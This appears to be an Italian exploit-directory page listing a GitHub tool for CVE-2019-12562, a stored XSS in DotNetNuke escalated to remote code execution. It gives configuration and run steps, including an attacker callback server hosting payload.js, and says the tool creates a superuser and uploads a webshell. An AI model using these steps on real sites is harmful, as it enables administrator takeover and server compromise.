Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-12562 — Cross-Site Scripting persistente in DotNetNuke (DNN) versioni precedenti alla 9.4.0 | Da XSS a RCE | Kitploit
Strumenti/GitHubGitHub/mayaseven/cve-2019-12562
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Cross-Site Scripting persistente in DotNetNuke (DNN) versioni precedenti alla 9.4.0 | Da XSS a RCE

Vedi Repository
8416 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-12562

CVE-2019-12562 La Cross-Site Scripting persistente (Stored XSS) in DotNetNuke (DNN) versioni precedenti alla 9.4.0 consente a un attaccante remoto di memorizzare e incorporare lo script dannoso nella pagina di notifica dell'amministratore. L'exploit può essere utilizzato per compiere qualsiasi azione con privilegi di amministratore, come gestire i contenuti, aggiungere utenti, caricare backdoor sul server, ecc. Lo sfruttamento va a buon fine quando un utente amministratore visita una pagina di notifica con la cross-site scripting memorizzata.

Sfruttamento

  • Configura il file dell'exploit
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Esegui l'exploit; se il target è vulnerabile, l'exploit registrerà un utente fittizio con XSS inserito nel campo "Display Name" e riceverai payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Devi avviare il webserver e posizionare payload.js su di esso per attendere la connessione dell'amministratore.
root@kitploit:~
python -m SimpleHTTPServer 1337

Questo exploit creerà un superutente e caricherà una webshell sul server di destinazione

Condizione dell'exploit: lo sfruttamento riesce quando un utente amministratore visita una pagina di notifica.

Per saperne di più: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Riferimento CVE: https://www.cvedetails.com/cve/CVE-2019-12562/

Scarica lo strumento